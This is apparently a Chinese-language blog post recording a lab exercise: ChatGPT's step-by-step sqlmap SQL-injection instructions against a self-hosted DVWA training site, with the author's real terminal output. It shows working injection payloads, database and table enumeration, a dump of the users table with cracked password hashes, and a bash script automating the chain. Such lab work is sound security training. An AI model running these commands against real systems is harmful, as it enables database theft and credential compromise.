[研究]用sqlmap 1.9.2 對 DVWA 1.10滲透測試
2025-05-09
先架設好靶機
[研究] Damn Vulnerable Web App (DVWA) 1.10 滲透測試練習(靶機)平台安裝 (Windows 2025)
https://shaurong.blogspot.com/2025/05/damn-vulnerable-web-app-dvwa-110.html
預設帳號 admin,預設密碼 password
********************************************************************************
請以 https://192.168.128.144/dvwa/ 為目標用 sqlmap 說明入侵滲透測試成功具體步驟 ?
ChatGPT 說:
以下是使用 sqlmap 對靶機 https://192.168.128.144/dvwa/ 進行 SQL Injection 滲透測試的完整具體步驟(以 成功測試 為目標),假設你已經架設好 DVWA,並能透過網址正常存取。
✅ 前提準備(必做)
確認 DVWA 啟動正常,網址可連:
https://192.168.128.144/dvwa/
DVWA 安全性設為 Low:
登入 admin / password
點選左側 DVWA Security → 設為 Low
確認目標頁面存在 SQL Injection 功能:
點選左側 SQL Injection,得到網址
https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
**********
筆者註:不管DVWA 安全性設為 Low或不設定,實際測試得到的網址是
https://192.168.128.144/dvwa/vulnerabilities/sqli/
或許是 DVWA 版的差異,或 ChatGPT 的錯誤,
但sqlmap是必須使用有參數的網址,所以後面還是照 ChatGPT 給的有參數的網址測試;
**********
關閉 CSRF 保護(選用):
若測試過程中遇到 CSRF token 問題,可在 /config/config.inc.php 中設定 $_DVWA[ 'default_security_level' ] = 'low';
🧪 滲透測試具體步驟
步驟一:擷取 Cookie
因為 DVWA 有登入機制,sqlmap 需附帶 Cookie,否則會被導向登入頁面。
用瀏覽器開發者工具(F12)複製 Cookie:
在登入後網頁中按 F12 → Network → reload 頁面 → 點選 /vulnerabilities/sqli/ → Headers → 找出並複製類似這樣的 Cookie:
得知登入帳號的 Cookie 為 PHPSESSID=nq6m5qpstheh95saak75aa7phs
步驟二:執行 sqlmap
使用以下指令:
sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" --batch --level=3 --risk=2 --dbs
指令說明:
- -u:目標 URL(注意包含參數)
- --cookie:加上登入 Cookie
- --batch:自動接受預設選項(不需人工互動)
- --level=3 --risk=2:提高測試強度與範圍
- --dbs:列出資料庫名稱
實際測試
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" --batch --level=3 --risk=2 --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.9.2#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:27:06 /2025-05-09/
[04:27:06] [INFO] resuming back-end DBMS 'mysql'
[04:27:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=1' AND 6579=(SELECT (CASE WHEN (6579=6579) THEN 6579 ELSE (SELECT 6297 UNION SELECT 6929) END))-- -&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4045 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4045=4045,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SNWM&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7006 FROM (SELECT(SLEEP(5)))jYoz)-- GoNd&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7178786a71,0x7474637a48656f4553766d58614871664f644f5351516474775a744d7564475276465059774f4a47,0x716a786a71)-- -&Submit=Submit
---
[04:27:06] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.12, Apache 2.4.58
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:27:06] [INFO] fetching database names
available databases [6]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[04:27:06] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.128.144'
[*] ending @ 04:27:06 /2025-05-09/
┌──(kali㉿kali)-[~]
└─$ |
步驟三:查看回應結果
如果成功,會看到類似:
[04:27:06] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.12, Apache 2.4.58 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [04:27:06] [INFO] fetching database names available databases [6]: [*] dvwa [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test |
步驟四:列出 dvwa 裡的表格
sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" -D dvwa --tables
實際測試
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" -D dvwa --tables
___
__H__
___ ___[(]_____ ___ ___ {1.9.2#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:28:39 /2025-05-09/
[04:28:39] [INFO] resuming back-end DBMS 'mysql'
[04:28:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=1' AND 6579=(SELECT (CASE WHEN (6579=6579) THEN 6579 ELSE (SELECT 6297 UNION SELECT 6929) END))-- -&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4045 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4045=4045,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SNWM&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7006 FROM (SELECT(SLEEP(5)))jYoz)-- GoNd&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7178786a71,0x7474637a48656f4553766d58614871664f644f5351516474775a744d7564475276465059774f4a47,0x716a786a71)-- -&Submit=Submit
---
[04:28:39] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.58, PHP 8.2.12
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:28:39] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[04:28:39] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.128.144'
[*] ending @ 04:28:39 /2025-05-09/
┌──(kali㉿kali)-[~]
└─$
|
步驟五:抓出 users 表的資料
sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" -D dvwa -T users --dump
實際測試
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" -D dvwa -T users --dump
___
__H__
___ ___[(]_____ ___ ___ {1.9.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:29:12 /2025-05-09/
[04:29:12] [INFO] resuming back-end DBMS 'mysql'
[04:29:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=1' AND 6579=(SELECT (CASE WHEN (6579=6579) THEN 6579 ELSE (SELECT 6297 UNION SELECT 6929) END))-- -&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4045 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4045=4045,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SNWM&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7006 FROM (SELECT(SLEEP(5)))jYoz)-- GoNd&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7178786a71,0x7474637a48656f4553766d58614871664f644f5351516474775a744d7564475276465059774f4a47,0x716a786a71)-- -&Submit=Submit
---
[04:29:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.58, PHP 8.2.12
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:29:12] [INFO] fetching columns for table 'users' in database 'dvwa'
[04:29:12] [INFO] fetching entries for table 'users' in database 'dvwa'
[04:29:12] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[04:29:15] [INFO] using hash method 'md5_generic_passwd'
[04:29:15] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[04:29:15] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[04:29:15] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[04:29:15] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa
Table: users
[5 entries]
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2025-05-08 14:39:31 | 0 |
| 2 | gordonb | /hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2025-05-08 14:39:31 | 0 |
| 3 | 1337 | /hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2025-05-08 14:39:31 | 0 |
| 4 | pablo | /hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2025-05-08 14:39:31 | 0 |
| 5 | smithy | /hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2025-05-08 14:39:31 | 0 |
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
[04:29:15] [INFO] table 'dvwa.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.128.144/dump/dvwa/users.csv'
[04:29:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.128.144'
[*] ending @ 04:29:15 /2025-05-09/
┌──(kali㉿kali)-[~]
└─$
|
會看到使用者帳密資料。
✅ 其他參數(可選)
--passwords:列出發現的帳號密碼資訊
--os-shell:嘗試開啟 shell(需搭配 command injection 靶點)
--threads=10:加速測試
⚠️ 注意事項
務必在授權的靶機上測試,切勿用於非授權網站(違法)
DVWA 頁面路徑與參數要確認正確
sqlmap 若無法注入成功,嘗試調整 --level 和 --risk
********************************************************************************
ChatGPT 說:
以下是一個 Bash 腳本:
📜 腳本:dvwa_sqlmap_attack.sh
#!/bin/bash # =========[ 請手動填入以下變數 ]========= TARGET_URL="https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" COOKIE="PHPSESSID=請改成你的sessionID; security=low" # ====================================== echo "[1/4] 正在列出資料庫..." sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --batch --level=3 --risk=2 --dbs echo "[2/4] 正在列出 dvwa 資料庫中的表格..." sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --batch --level=3 --risk=2 -D dvwa --tables echo "[3/4] 正在列出 dvwa.users 表格中的欄位..." sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --batch --level=3 --risk=2 -D dvwa -T users --columns echo "[4/4] 正在匯出 dvwa.users 表格的資料..." sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --batch --level=3 --risk=2 -D dvwa -T users --dump echo "✅ 攻擊完成。" |
✅ 使用方式:
將上方腳本內容儲存成 dvwa_sqlmap_attack.sh
修改 Cookie 為你瀏覽器中登入 DVWA 時的值:
COOKIE="PHPSESSID=123456abcdef7890; security=low"
在終端機中給予執行權限:
chmod +x dvwa_sqlmap_attack.sh |
執行腳本:
./dvwa_sqlmap_attack.sh
|
🛠 補充建議:
如果有 HTTPS 憑證錯誤,可以在 sqlmap 命令中加入 --ignore-code=403 或 --force-ssl。
若執行時卡住,可嘗試加入 --threads=5 加快測試速度。
(完)
沒有留言:
張貼留言